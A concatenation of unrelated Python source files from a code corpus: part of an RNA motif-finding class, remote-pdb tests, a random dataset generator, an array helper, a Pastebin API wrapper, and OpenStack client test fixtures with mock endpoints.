if len(seqs) > sample_size:
sample_seqs = random.sample(seqs, sample_size)
else:
sample_seqs = seqs
align_seqs = ma.transform(seqs=sample_seqs)
score, trimmed_align_seqs = self._compute_score(align_seqs,
min_freq=min_freq)
if score >= min_score and len(align_seqs) > min_cluster_size:
consensus_seq = self._compute_consensus_seq(trimmed_align_seqs)
regex_seq = consensus_regex(trimmed_align_seqs, regex_th)
motif = {'consensus_seq': consensus_seq,
'regex_seq': regex_seq,
'trimmed_align_seqs': trimmed_align_seqs,
'align_seqs': align_seqs,
'seqs': seqs}
return True, motif
else:
return False, None
def compute_motives(self,
clusters,
min_score=4,
min_freq=0.6,
min_cluster_size=10,
regex_th=.3,
sample_size=200):
"""compute_motives."""
if not clusters:
raise Exception('Error: No clusters.')
mcs = min_cluster_size
logger.debug('Alignment')
motives = dict()
for cluster_id in clusters:
start_time = time.time()
# align with muscle
is_high_quality, motif = self.compute_motif(
seqs=clusters[cluster_id],
min_score=min_score,
min_freq=min_freq,
min_cluster_size=mcs,
regex_th=regex_th,
sample_size=sample_size)
if is_high_quality:
motives[cluster_id] = motif
dtime = time.time() - start_time
logger.debug(
'Cluster %d (#%d) (%.2f secs)' %
(cluster_id, len(clusters[cluster_id]), dtime))
logger.debug('After motives computation, %d motives' % len(motives))
return motives
def _identify_mergeable_clusters(self, motives, similarity_th=0.8):
for i in motives:
for j in motives:
if j > i:
seq_i = motives[i]['consensus_seq']
seq_j = motives[j]['consensus_seq']
nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1)
rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j))
if rel_nw_score > similarity_th:
yield rel_nw_score, i, j
def merge(self,
motives,
similarity_th=0.5,
min_score=4,
min_freq=0.5,
min_cluster_size=10,
regex_th=.3,
sample_size=200):
"""merge."""
while True:
ms = sorted([m for m in self._identify_mergeable_clusters(
motives, similarity_th=similarity_th)], reverse=True)
success = False
for rel_nw_score, i, j in ms:
if motives.get(i, None) and motives.get(j, None):
n_i = len(motives[i]['seqs'])
n_j = len(motives[j]['seqs'])
seqs = motives[i]['seqs'] + motives[j]['seqs']
is_high_quality, motif = self.compute_motif(
seqs=seqs,
min_score=min_score,
min_freq=min_freq,
min_cluster_size=min_cluster_size,
regex_th=regex_th,
sample_size=sample_size)
if is_high_quality:
info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f' % \
(i, n_i, j, n_j, rel_nw_score)
info2 = ' deleting: %d [%d is now #%d]' % \
(j, i, n_i + n_j)
logger.debug(info1 + info2)
# update motives
motives[i] = motif
del motives[j]
success = True
if success is False:
break
# TODO: run the predictor to learn the new class definition
logger.debug('After merge, %d motives' % len(motives))
return motives
def quality_filter(self,
seqs=None,
motives=None,
freq_th=None,
std_th=None):
"""quality_filter."""
_motives = dict()
for cluster_id in motives:
regex_seq = motives[cluster_id]['regex_seq']
counts, freq = occurrences(regex_seq, seqs)
motives[cluster_id]['freq'] = freq
motives[cluster_id]['counts'] = counts
avg, std = extract_location(regex_seq, seqs)
motives[cluster_id]['avg_pos'] = avg
motives[cluster_id]['std_pos'] = std
if freq_th is None or freq >= freq_th:
if std_th is None or std <= std_th:
_motives[cluster_id] = motives[cluster_id]
if len(_motives) == 0:
logger.warning('Quality filter is too strict. Ignoring filter.')
return motives
else:
logger.debug('After quality filter, %d motives' % len(_motives))
return _motives
def select_motives(self,
seqs=None,
p_value=0.05,
similarity_th=0.5,
min_score=4,
min_freq=0.5,
min_cluster_size=10,
regex_th=.3,
sample_size=200,
freq_th=None,
std_th=None):
"""select_motives."""
orig_clusters = self.compute_clusters(seqs, p_value=p_value)
motives = self.compute_motives(
orig_clusters,
min_score=min_score,
min_freq=min_freq,
min_cluster_size=min_cluster_size,
regex_th=regex_th,
sample_size=sample_size)
motives = self.merge(
motives,
similarity_th=similarity_th,
min_score=min_score,
min_freq=min_freq,
min_cluster_size=min_cluster_size,
regex_th=regex_th,
sample_size=sample_size)
motives = self.quality_filter(
seqs,
motives,
freq_th=freq_th,
std_th=std_th)
return motives
def compute_logo(self,
cluster_id=None,
motif=None):
"""compute_logo."""
alphabet = 'rna'
color_scheme = 'classic'
wb = Weblogo(output_format='png',
sequence_type=alphabet,
resolution=200,
stacks_per_line=60,
units='bits',
color_scheme=color_scheme)
logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs'])
logo_txt = []
info = ' - num subarrays: %d' % len(motif['seqs'])
logo_txt.append(info)
info = ' - consensus sequence: %s' % motif['consensus_seq']
logo_txt.append(info)
info = ' - consensus regex: %s' % motif['regex_seq']
logo_txt.append(info)
return logo_image, logo_txt
def compute_logos(self,
motives,
ids=None):
"""compute_logos."""
if motives:
if ids is None:
ids = [cluster_id for cluster_id in motives]
logos = dict()
for cluster_id in ids:
logo_image, logo_txt = self.compute_logo(
cluster_id=cluster_id,
motif=motives[cluster_id])
logos[cluster_id] = (logo_image, logo_txt)
return logos
else:
logger.warning(
'No logo to compute. Try more permissive parameters.')
def _save_logo(self, logo, cluster_id, fname):
imagename = '%s_logo_cl_%d.png' % (fname, cluster_id)
with open(imagename, 'wb') as f:
f.write(logo)
return imagename
def _wrap_image(self, fname, fill_width=True, output_type='screen'):
pwd = os.getcwd()
url = pwd + '/' + fname
txt = []
if fill_width:
if output_type == 'pdf':
txt.append('<p align="left"><img src="file://' + url +
'" style="width: 100%"></p>')
else:
txt.append('<p align="left"><img src="' + fname +
'" style="width: 100%"></p>')
else:
if output_type == 'pdf':
txt.append('<p align="left"><img src="file://' + url +
'"></p>')
else:
txt.append('<p align="left"><img src="' + fname +
'"></p>')
return '\n'.join(txt)
def report(self,
pos_seqs,
all_seqs,
motives,
nbins=40,
size=(17, 2),
output_type='screen',
fname=None):
"""Report in markdown format."""
txt = []
if motives:
_, norm_cooccurence_mtx, distances = compute_cooccurence(motives)
info = '### Summary: %d motives' % len(motives)
txt.append(info)
figname = plot_cumulative_score(
self, pos_seqs, size=size, fname=fname)
txt.append(self._wrap_image(figname, output_type=output_type))
for freq, cluster_id in sorted([(motives[i]['freq'], i)
for i in motives], reverse=True):
info = ' - %.2s %s' % \
(cluster_id, motives[cluster_id]['consensus_seq'])
txt.append(info)
for freq, cluster_id in sorted([(motives[i]['freq'], i)
for i in motives], reverse=True):
info = '#### Motif id: %d' % cluster_id
txt.append(info)
logo_image, logo_txts = self.compute_logo(
cluster_id, motif=motives[cluster_id])
figname = self._save_logo(logo_image, cluster_id, fname)
for logo_txt in logo_txts:
txt.append(logo_txt)
co = motives[cluster_id]['counts']
fr = motives[cluster_id]['freq']
info = ' - num occurrences of regex: %d' % (co)
txt.append(info)
info = ' - freq of occurrences of regex: %.2f' % (fr)
txt.append(info)
av = motives[cluster_id]['avg_pos']
st = motives[cluster_id]['std_pos']
info = ' - average location: %.1f +- %.1f' % (av, st)
txt.append(info)
txt.append(self._wrap_image(figname,
fill_width=False,
output_type=output_type))
regex_i = motives[cluster_id]['regex_seq']
figname = plot_location(
regex_i, all_seqs, cluster_id=cluster_id,
nbins=nbins, size=size, fname=fname)
txt.append(self._wrap_image(figname, output_type=output_type))
for j in motives:
regex_i = motives[i]['regex_seq']
if j != cluster_id:
regex_j = motives[j]['regex_seq']
ds = distances[(cluster_id, j)]
info = ' - num co-occurences %d %s vs %d %s: %d' % \
(cluster_id, regex_i, j, regex_j, len(ds))
txt.append(info)
if len(ds):
figname = plot_distance(
cluster_id, j,
regex_i, regex_j,
distances,
nbins=nbins, size=size, fname=fname)
txt.append(self._wrap_image(
figname,
output_type=output_type))
txt.append('_' * 100)
else:
logger.warning(
'No motives to report. Try more permissive parameters.')
txt = '\n'.join(txt)
return txt
| 2.109375 | 2 |
tests/test_remote_pdb.py | MatthewWilkes/python-remote-pdb | 0 | 12794292 | from __future__ import print_function
import logging
import os
import re
import socket
import sys
import time
from process_tests import TestProcess
from process_tests import TestSocket
from process_tests import dump_on_error
from process_tests import wait_for_strings
from remote_pdb import set_trace
TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10))
def test_simple():
with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc:
with dump_on_error(proc.read):
wait_for_strings(proc.read, TIMEOUT,
'{a1}',
'{b1}',
'RemotePdb session open at ')
host, port = re.findall("RemotePdb session open at (.+):(.+),", proc.read())[0]
with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client:
with dump_on_error(client.read):
wait_for_strings(proc.read, TIMEOUT, 'accepted connection from')
wait_for_strings(client.read, TIMEOUT, "-> print('{b2}')")
client.fh.write(b'quit\r\n')
wait_for_strings(proc.read, TIMEOUT, 'DIED.')
def test_redirect():
with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc:
with dump_on_error(proc.read):
wait_for_strings(proc.read, TIMEOUT,
'{a1}',
'{b1}',
'RemotePdb session open at ')
host, port = re.findall("RemotePdb session open at (.+):(.+),", proc.read())[0]
with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client:
with dump_on_error(client.read):
wait_for_strings(proc.read, TIMEOUT, 'accepted connection from')
wait_for_strings(client.read, TIMEOUT, "-> print('{b2}')")
client.fh.write(b'break func_a\r\n')
client.fh.write(b'continue\r\n')
wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}')
wait_for_strings(client.read, TIMEOUT, "-> print('{a2}')")
client.fh.write(b'continue\r\n')
wait_for_strings(client.read, TIMEOUT, "{=>")
wait_for_strings(proc.read, TIMEOUT, 'DIED.')
assert 'Restoring streams' not in proc.read()
def test_simple_break():
with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc:
with dump_on_error(proc.read):
wait_for_strings(proc.read, TIMEOUT,
'{a1}',
'{b1}',
'RemotePdb session open at ')
host, port = re.findall("RemotePdb session open at (.+):(.+),", proc.read())[0]
with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client:
with dump_on_error(client.read):
wait_for_strings(proc.read, TIMEOUT, 'accepted connection from')
wait_for_strings(client.read, TIMEOUT, "-> print('{b2}')")
client.fh.write(b'break func_a\r\n')
client.fh.write(b'continue\r\n')
wait_for_strings(client.read, TIMEOUT, "-> print('{a2}')")
client.fh.write(b'continue\r\n')
wait_for_strings(proc.read, TIMEOUT, 'DIED.')
assert 'Restoring streams' not in proc.read()
def func_b(patch_stdstreams):
print('{b1}')
set_trace(patch_stdstreams=patch_stdstreams)
print('{b2}')
def func_a(block=lambda _: None, patch_stdstreams=False):
print('{a1}')
func_b(patch_stdstreams)
print('{a2}')
x = block('{a3} ?')
print('{=> %s}' % x)
if __name__ == '__main__':
logging.basicConfig(
level=logging.DEBUG,
format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s',
datefmt="%x~%X"
)
test_name = sys.argv[2]
if test_name == 'test_simple':
func_a()
elif test_name == 'test_redirect':
func_a(patch_stdstreams=True)
time.sleep(TIMEOUT)
else:
raise RuntimeError('Invalid test spec %r.' % test_name)
logging.info('DIED.')
| 2.21875 | 2 |
src/web_api/routers/__init__.py | poyang31/hw_2021_12 | 3 | 12794293 | <gh_stars>1-10
from ...kernel import Config, Database
config = Config()
database = Database(config)
articles_collection = database.get_collection("articles")
results_collection = database.get_collection("results")
| 1.523438 | 2 |
test/gends.py | jlinoff/cmpds | 0 | 12794294 | <reponame>jlinoff/cmpds<gh_stars>0
#!/usr/bin/env python
'''
Generate random floating point numbers in a range for testing.
It is used to create datasets to test cmpds.
You can decorate the datasets with a header and record counts to
make them easier to read. That works because cmpds allows you
to specify which column to read in the dataset file.
Typically you would want to generate at least 50 elements to enable
the use of the standard normal distribution (SND) for analysis.
'''
# License: MIT Open Source
# Copyright (c) 2016 by <NAME>
import argparse
import datetime
import inspect
import os
import random
import sys
VERSION = '0.1'
def generate_dataset(n, lower, upper):
'''
Generate a datasets of n elements in the range [lower..upper].
A typical call might be something like:
n = 50
lower = 98
upper = 101
'''
for i in range(n):
r = random.uniform(lower, upper)
yield r
def info(msg, f=1):
'''
Write an info message to stdout.
'''
lineno = inspect.stack()[f][2]
print('INFO:{} {}'.format(lineno, msg))
def warn(msg, f=1):
'''
Write a warning message to stdout.
'''
lineno = inspect.stack()[f][2]
print('WARNING:{} {}'.format(lineno, msg))
def err(msg, f=1):
'''
Write an error message to stderr and exit.
'''
lineno = inspect.stack()[f][2]
sys.stderr.write('ERROR:{} {}\n'.format(lineno, msg))
sys.exit(1)
def getopts():
'''
Get the command line options using argparse.
'''
# Trick to capitalize the built-in headers.
# Unfortunately I can't get rid of the ":" reliably.
def gettext(s):
lookup = {
'usage: ': 'USAGE:',
'optional arguments': 'OPTIONAL ARGUMENTS',
'show this help message and exit': 'Show this help message and exit.\n ',
}
return lookup.get(s, s)
argparse._ = gettext # to capitalize help headers
base = os.path.basename(sys.argv[0])
name = os.path.splitext(base)[0]
usage = '\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base)
desc = 'DESCRIPTION:{0}'.format('\n '.join(__doc__.split('\n')))
epilog = r'''
EXAMPLES:
# Example 1: help
$ {0} -h
# Example 2: generate a dataset that mocks runtimes between
# 115 and 125 seconds per run.
# Typically you would want to generate at least 50
# elements to enable the use of the SND for analysis.
$ {0} 8 115 125
124.409
121.153
116.976
115.358
123.128
121.975
124.312
122.044
# Example 3: generate a dataset that mocks runtimes between
# 115 and 125 seconds per run and is decorated.
# Typically you would want to generate at least 50
# elements to enable the use of the SND for analysis.
$ {0} -D 8 115 125
# date = 2016-11-24 08:27:49.668509
# num = 8
# lower = 115.000
# upper = 125.000
# decimal places = 3
1 116.212
2 122.327
3 118.571
4 120.238
5 124.852
6 119.652
7 116.400
8 122.446
# Example 4: generate a dataset that mocks runtimes between
# 10 and 12 seconds with 2 decimal digits of precision.
# Typically you would want to generate at least 50
# elements to enable the use of the SND for analysis.
$ {0} -D -d 2 6 10 12
# date = 2016-11-24 08:30:31.039108
# num = 6
# lower = 10.000
# upper = 12.000
# decimal places = 2
1 10.30
2 11.48
3 10.50
4 10.25
5 10.52
6 11.34
'''.format(base)
afc = argparse.RawTextHelpFormatter
parser = argparse.ArgumentParser(formatter_class=afc,
description=desc[:-2],
usage=usage,
epilog=epilog)
parser.add_argument('-d', '--decimal-places',
action='store',
type=int,
metavar=('NUMBER'),
default=3,
help='''The number of decimal places.
The default is %(default)s.
''')
parser.add_argument('-D', '--decorate',
action='store_true',
help='''Print header and line numbers.
''')
parser.add_argument('-v', '--verbose',
action='count',
help='''Increase the level of verbosity.
''')
parser.add_argument('-V', '--version',
action='version',
version='%(prog)s v{0}'.format(VERSION),
help="""Show program's version number and exit.
""")
# Positional arguments at the end.
parser.add_argument('num',
nargs=1,
action='store',
type=int,
help='''The number of elements in the dataset.
''')
parser.add_argument('lower',
nargs=1,
action='store',
type=float,
help='''The lower bound.
''')
parser.add_argument('upper',
nargs=1,
action='store',
type=float,
help='''The upper bound.
''')
opts = parser.parse_args()
return opts
def main():
'''
Main entry point.
'''
opts = getopts()
num = opts.num[0]
lower = opts.lower[0]
upper = opts.upper[0]
if lower > upper:
err('lower bound {} must be less than upper bound {}'.format(lower, upper))
if opts.decorate:
print('# date = {}'.format(datetime.datetime.now()))
print('# num = {}'.format(num))
print('# lower = {:.3f}'.format(lower))
print('# upper = {:.3f}'.format(upper))
print('# decimal places = {}'.format(opts.decimal_places))
i = 0
for r in generate_dataset(num, lower, upper):
if opts.decorate:
i += 1
f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places)
print(f.format(i, r))
else:
f = '{{:>10.{}f}}'.format(opts.decimal_places)
print(f.format(r))
if __name__ == '__main__':
main()
| 3.734375 | 4 |
prep_and_learning/python/arrays/arrayops.py | adityaka/misc_scripts | 1 | 12794295 | from typing import List
class ArrayOps(object):
def __init__(self, input_array:List[int] ):
self._input = input_array
def _validate_index(self, index):
assert (index > len(self._input), "Index can't be greater than length")
def remove_at(self, index):
self._validate_index(index)
i = index
length = len(self._input)
while i+1 < length:
self._input[i] = self._input[i+1]
i+=1
self._input.pop(len(self._input)-1)
def insert_at(self, index, data):
self._validate_index(index)
self._input[index] = data
def remove_duplicates(self):
dup_map = dict()
for i in range(len(self._input)):
if self._input[i] in dup_map.keys():
del self._input[i]
else:
dup_map[self._input[i]] = i
def find_duplicates(self):
dup_map = dict()
for i in range(len(self._input)):
if self._input[i] in dup_map:
dup_map[self._input[i]] += 1
else:
dup_map[self._input[i]] = 1
return dup_map.keys()
| 3.671875 | 4 |
pastebin.py | Optixal/pastebin-wrapper | 1 | 12794296 | #!/usr/bin/python3
# Light Pastebin Wrapper
# By Optixal
# Pastebin Documentation: https://pastebin.com/api
import requests, os
# Precedence of Confidential Information:
# Environment Variable > Function Argument > Constant Defined Here
# Recommended: Set confidential information as environment variables with "export PASTEBIN_DEV_KEY=abc123". You can store the "export" commands within a file named "keys" as well and run "source keys".
PASTEBIN_DEV_KEY = ''
PASTEBIN_USER_NAME = ''
PASTEBIN_USER_PASSWORD = ''
# Pastes code/text anonymously to Pastebin
# Returns: paste_url, the URL containing the paste
def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'):
data = {
'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key),
'api_user_key' : user_key,
'api_option' : option,
'api_paste_private' : str(paste_private),
'api_paste_name' : paste_name,
'api_paste_expire_date' : paste_expire_date,
'api_paste_format' : paste_format,
'api_paste_code' : paste_code,
}
url = 'https://pastebin.com/api/api_post.php'
r = requests.post(url, data=data)
if r.status_code == 200 and 'Bad' not in r.text: return r.text
else: raise PasteError(r.text)
class PasteError(Exception):
def __init__(self, response):
self.response = response
def __str__(self):
return repr(self.response)
# Authenticate with Pastebin with username and password
# Returns: user_key, a session key used when pasting a non-guest paste
def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>):
data = {
'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key),
'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name),
'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password),
}
url = 'https://pastebin.com/api/api_login.php'
r = requests.post(url, data=data)
if r.status_code == 200 and 'Bad' not in r.text: return r.text
else: raise LoginError(r.text)
class LoginError(Exception):
def __init__(self, response):
self.response = response
def __str__(self):
return repr(self.response)
| 2.21875 | 2 |
ospurge/tests/client_fixtures.py | esracelik/ospurge | 0 | 12794297 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright © 2014 Cloudwatt
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
TOKEN_ID = '<KEY>'
USER_ID = '<PASSWORD>'
PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58'
AUTH_URL = "http://localhost:5000/v2.0"
ROLE_URL = "http://admin:35357/v2.0/OS-KSADM"
VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58'
IMAGE_PUBLIC_ENDPOINT = 'http://public:9292'
STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8'
NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net'
COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5'
METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net'
ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1'
VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58'
IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292'
STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8'
NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696'
COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5'
METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777'
ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1'
AUTH_URL_RESPONSE = {
u'version': {
u'id': u'v2.0',
u'links': [
{u'href': u'%s' % AUTH_URL, u'rel': u'self'},
{u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/',
u'rel': u'describedby',
u'type': u'text/html'},
{u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf',
u'rel': u'describedby',
u'type': u'application/pdf'}
],
u'media-types': [
{u'base': u'application/json',
u'type': u'application/vnd.openstack.identity-v2.0+json'},
{u'base': u'application/xml',
u'type': u'application/vnd.openstack.identity-v2.0+xml'}
],
u'status': u'stable',
u'updated': u'2014-04-17T00:00:00Z'
}
}
STORAGE_CONTAINERS = ['janeausten', 'marktwain']
STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'},
{'container': 'janeausten', 'name': 'bar'},
{'container': 'marktwain', 'name': 'hello world'}]
VOLUMES_IDS = ["45baf976-c20a-4894-a7c3-c94b7376bf55",
"5aa119a8-d25b-45a7-8d1b-88e127885635"]
SNAPSHOTS_IDS = ["3fbbcccf-d058-4502-8844-6feeffdf4cb5",
"e479997c-650b-40a4-9dfe-77655818b0d2"]
VOLUME_BACKUP_IDS = ["803a2ad2-893b-4b42-90d9-eb5f09a8421a"]
ROUTERS_IDS = ["7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b",
"a9254bdb-2613-4a13-ac4c-adc581fba50d"]
PORTS_IDS = ["d7815f5b-a228-47bb-a5e5-f139c4e476f6"]
NETWORKS_IDS = ["9d83c053-b0a4-4682-ae80-c00df269ce0a",
"ebda9658-093b-41ba-80ce-0cf8cb8365d4"]
SECGROUPS_IDS = ["85cc3048-abc3-43cc-89b3-377341426ac5"]
FLOATING_IPS_IDS = ["2f245a7b-796b-4f26-9cf9-9e82d248fda7",
"61cea855-49cb-4846-997d-801b70c71bdd"]
SERVERS_IDS = ["616fb98f-46ca-475e-917e-2563e5a8cd19"]
IMAGES_IDS = ["37717f53-3707-49b9-9dd0-fd063e6b9fc5", "4e150966-cbe7-4fd7-a964-41e008d20f10",
"482fbcc3-d831-411d-a073-ddc828a7a9ed"]
ALARMS_IDS = ["ca950223-e982-4552-9dec-5dc5d3ea4172"]
STACKS_IDS = ["5c136348-5550-4ec5-8bd6-b83241844db3",
"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9"]
UNBOUND_PORT_ID = "abcdb45e-45fe-4e04-8704-bf6f58760000"
PRIVATE_PORT_IDS = ["p7815f5b-a228-47bb-a5e5-f139c4f476ft", "p78o5f5t-a228-47bb-a5e2-f139c4f476ft"]
FIREWALL_RULE_IDS = ["firebcc3-d831-411d-a073-ddc828a7a9id",
"fi7815f5b-a328-47cb-a5e5-f139c4e476f7"]
FIREWALL_POLICY_IDS = ["firebcc3-d831-422d-a073-ccc818a7a9id", "poa119a8-d25b-45a7-8d1b-88e127885630"]
FIREWALL_IDS = ["firewal1-d831-422d-a073-ckc818a7a9ab", "firewa1l-d831-422d-a073-ckc818a7a9ab"]
METERING_LABEL_IDS = ["mbcdb45e-45fe-4e04-8704-bf6f58760011", "meteb45e-45fe-4e04-8704-bf6f58760000"]
LBAAS_MEMBER_IDS = ["37717f53-3707-49b9-9dd0-fd063e6lbass", "la650123-e982-4552-9dec-5dc5d3ea4172"]
LBAAS_VIP_IDS = ["616fb98f-36ca-475e-917e-1563e5a8cd10", "102fbcc3-d831-411d-a333-ddc828a7a9ed"]
LBAAS_HEALTHMONITOR_IDS = ["he717f53-3707-49b9-9dd0-fd063e6lbass"]
LBAAS_POOL_IDS = ["lb815f5b-a228-17bb-a5e5-f139c3e476f6", "dlb15f5b-a228-47bb-a5e5-f139c4e47po6"]
# Simulating JSON sent from the Server
PROJECT_SCOPED_TOKEN = {
'access': {
'serviceCatalog':
[{
'endpoints': [{
'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58',
'internalURL': VOLUME_INTERNAL_ENDPOINT,
'publicURL': VOLUME_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Volume Service',
'type': 'volume'
}, {
'endpoints': [{
'adminURL': 'http://admin:9292/v1',
'internalURL': IMAGE_INTERNAL_ENDPOINT,
'publicURL': IMAGE_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Image Service',
'type': 'image'
}, {
'endpoints': [{
'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58',
'internalURL': COMPUTE_INTERNAL_ENDPOINT,
'publicURL': COMPUTE_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Compute Service',
'type': 'compute'
}, {
'endpoints': [{
'adminURL': 'http://admin:8773/services/Admin',
'internalURL': 'http://internal:8773/services/Cloud',
'publicURL': 'http://public:8773/services/Cloud',
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'EC2 Service',
'type': 'ec2'
}, {
'endpoints': [{
'adminURL': 'http://admin:35357/v2.0',
'internalURL': 'http://internal:5000/v2.0',
'publicURL': 'http://public:5000/v2.0',
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Identity Service',
'type': 'identity'
}, {
'endpoints': [{
'adminURL': 'http://admin:8080',
'internalURL': STORAGE_INTERNAL_ENDPOINT,
'publicURL': STORAGE_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Object Storage Service',
'type': 'object-store'
}, {
'endpoints': [{
'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696',
'internalURL': NETWORK_INTERNAL_ENDPOINT,
'publicURL': NETWORK_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Network Service',
'type': 'network'
}, {
'endpoints': [{
'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777',
'internalURL': METERING_INTERNAL_ENDPOINT,
'publicURL': METERING_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Metering service',
'type': 'metering'
}, {
'endpoints': [{
'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777',
'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT,
'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Orchestration service',
'type': 'orchestration'
}],
'token': {
'expires': '2012-10-03T16:53:36Z',
'id': TOKEN_ID,
'tenant': {
'description': '',
'enabled': True,
'id': PROJECT_ID,
'name': 'exampleproject'
}
},
'user': {
'id': USER_ID,
'name': 'exampleuser',
'roles': [{
'id': 'edc12489faa74ee0aca0b8a0b4d74a74',
'name': 'Member'}],
'roles_links': [],
'username': 'exampleuser'
}
}
}
ROLE_LIST = {u'roles': [
{u'id': u'201c290919ec4d6bb350401f8b4145a3',
u'name': u'heat_stack_owner'},
{u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'},
{u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'},
{u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'},
{u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'},
{u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'},
{u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'},
{u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}]
}
STORAGE_CONTAINERS_LIST = [
{
"count": 0,
"bytes": 0,
"name": STORAGE_CONTAINERS[0]
},
{
"count": 1,
"bytes": 14,
"name": STORAGE_CONTAINERS[1]
}
]
STORAGE_OBJECTS_LIST_0 = [
{
"hash": "451e372e48e0f6b1114fa0724aa79fa1",
"last_modified": "2014-01-15T16:41:49.390270",
"bytes": 14,
"name": STORAGE_OBJECTS[0]['name'],
"content_type":"application/octet-stream"
},
{
"hash": "ed076287532e86365e841e92bfc50d8c",
"last_modified": "2014-01-15T16:37:43.427570",
"bytes": 12,
"name": STORAGE_OBJECTS[1]['name'],
"content_type":"application/octet-stream"
}
]
STORAGE_OBJECTS_LIST_1 = [
{
"hash": "451e372e48e0f6b1114fa0724aa7AAAA",
"last_modified": "2014-01-15T16:41:49.390270",
"bytes": 14,
"name": STORAGE_OBJECTS[2]['name'],
"content_type":"application/octet-stream"
}
]
VOLUMES_LIST = {
"volumes": [
{
"attachments": [],
"availability_zone": "nova",
"bootable": "false",
"created_at": "2014-02-03T14:22:52.000000",
"display_description": None,
"display_name": "toto",
"id": VOLUMES_IDS[0],
"metadata": {},
"size": 1,
"snapshot_id": None,
"source_volid": None,
"status": "available",
"volume_type": "None"
},
{
"attachments": [],
"availability_zone": "nova",
"bootable": "true",
"created_at": "2014-02-03T14:18:34.000000",
"display_description": "",
"display_name": "CirrOS v0.3.0",
"id": VOLUMES_IDS[1],
"metadata": {},
"size": 1,
"snapshot_id": None,
"source_volid": None,
"status": "available",
"volume_type": "None"
}
]
}
SNAPSHOTS_LIST = {
"snapshots": [
{
"id": SNAPSHOTS_IDS[0],
